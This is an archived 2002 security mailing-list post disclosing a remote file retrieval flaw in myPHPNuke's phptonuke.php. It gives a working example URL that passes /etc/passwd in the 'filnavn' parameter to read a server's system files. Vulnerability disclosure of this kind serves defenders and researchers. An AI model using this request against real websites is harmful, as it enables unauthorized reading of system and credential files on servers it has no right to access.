phptonuke allows Remote File Retrieving

From: Zero-X ScriptKiddy (zero-xat_private)
Date: Wed Oct 16 2002 - 14:50:10 PDT

Next message: Martin Schulze: "[SECURITY] [DSA 176-1] New gv packages fix buffer overflow"

Previous message: Thor Larholm: "RE: Who Need Friends ? IE & MSN expose contact list & other info"
Next in thread: BlueRaven: "Re: phptonuke allows Remote File Retrieving"
Reply: BlueRaven: "Re: phptonuke allows Remote File Retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The file "phptonuke.php" from myphpnuke allows Remote File Retrieving.

Exploit Example:
http://website.com/phptonuke.php?filnavn=/etc/passwd


Zero X, member of www.Lobnan.de
-- 
Get your free email from www.linuxmail.org 


Powered by Outblaze

Next message: Martin Schulze: "[SECURITY] [DSA 176-1] New gv packages fix buffer overflow"
Previous message: Thor Larholm: "RE: Who Need Friends ? IE & MSN expose contact list & other info"
Next in thread: BlueRaven: "Re: phptonuke allows Remote File Retrieving"
Reply: BlueRaven: "Re: phptonuke allows Remote File Retrieving"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 16 2002 - 15:07:57 PDT